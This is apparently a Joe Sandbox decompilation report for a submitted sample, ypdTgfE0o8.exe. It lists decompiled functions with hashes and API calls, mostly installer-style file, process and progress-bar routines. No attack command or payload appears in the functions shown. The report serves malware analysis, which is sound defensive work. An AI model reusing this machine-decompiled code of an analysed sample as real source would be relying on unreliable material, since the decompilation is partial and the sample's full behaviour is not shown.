Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: 6ff43b3191649a75527d97ac2c164a3e64988898bdda7d9265b57bfb7f9fc5be
Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
Opcode Fuzzy Hash: 6ff43b3191649a75527d97ac2c164a3e64988898bdda7d9265b57bfb7f9fc5be
Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a250;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42920c =  *0x42920c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42920c, 0x7530,  *0x4291f4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEA Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AEA(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426710->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426710,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405af3
0x00405b13
0x00405b1b
0x00405b20
0x00000000
0x00405b26
0x00405b2a

APIs

CreateProcessW.KERNELBASE ref: 00405B13
CloseHandle.KERNEL32(?), ref: 00405B20

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C

Uniqueness

Uniqueness Score: -1.00%

Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004068D4(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E00406864(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x004068dc
0x004068df
0x004068e6
0x004068ee
0x004068fa
0x00000000
0x00406901
0x004068f1
0x004068f8
0x00000000
0x00406909
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
GetProcAddress.KERNEL32(00000000,?), ref: 00406901

Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669

Uniqueness

Uniqueness Score: -1.00%

Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405FF7(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405ffb
0x00406008
0x0040601d
0x00406023

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\ypdTgfE0o8.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FD2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x00405fd7
0x00405fdd
0x00405fe2
0x00405feb
0x00405feb
0x00405ff4

APIs

GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405FEB

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98

Uniqueness

Uniqueness Score: -1.00%

Function 00403ADC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403ADC() {
				void* _t1;
				void* _t3;
				signed int _t6;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
					_t6 =  *0x40a018;
				}
				E00403B21();
				_t3 = E00405C13(_t6, L"C:\\Users\\engineer\\AppData\\Local\\Temp\\nsa8A55.tmp\\", 7); // executed
				return _t3;
			}

0x00403adc
0x00403ae4
0x00403ae7
0x00403aed
0x00403aed
0x00403aed
0x00403af4
0x00403b00
0x00403b05

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403A28,?), ref: 00403AE7

Strings

C:\Users\user\AppData\Local\Temp\nsa8A55.tmp\, xrefs: 00403AFB

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\nsa8A55.tmp\
API String ID: 2962429428-2627277992
Opcode ID: ea98741a50f28c62fa16d60caa101c986c2838e233e377089e9036697fda9458
Instruction ID: d4db8dbaf33ff22f2ff991163c220eb3cd6c997f56162562831ac65c0e81f35c
Opcode Fuzzy Hash: ea98741a50f28c62fa16d60caa101c986c2838e233e377089e9036697fda9458
Instruction Fuzzy Hash: 15C01230504B0056D574AFB99E4FA053A649B4573DB600729B0F8B40F1CF7C5699995D

Uniqueness

Uniqueness Score: -1.00%

Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AB5(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405abb
0x00405ac3
0x00000000
0x00405ac9
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
GetLastError.KERNEL32 ref: 00405AC9

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040607A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040607A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040607e
0x0040608e
0x00406096
0x00000000
0x0040609d
0x00000000
0x0040609f

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060A9 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060A9(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060ad
0x004060bd
0x004060c5
0x00000000
0x004060cc
0x00000000
0x004060ce

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5

Uniqueness

Uniqueness Score: -1.00%

Function 004034AF Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034AF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034bd
0x004034c3

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E00405569(0xffffffeb, _t7);
				_t9 = E00405AEA(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E0040697F(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E0040644E( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405569: lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Part of subcall function 00405AEA: CreateProcessW.KERNELBASE ref: 00405B13
Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
Part of subcall function 0040697F: GetExitCodeProcess.KERNELBASE ref: 004069B2

Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
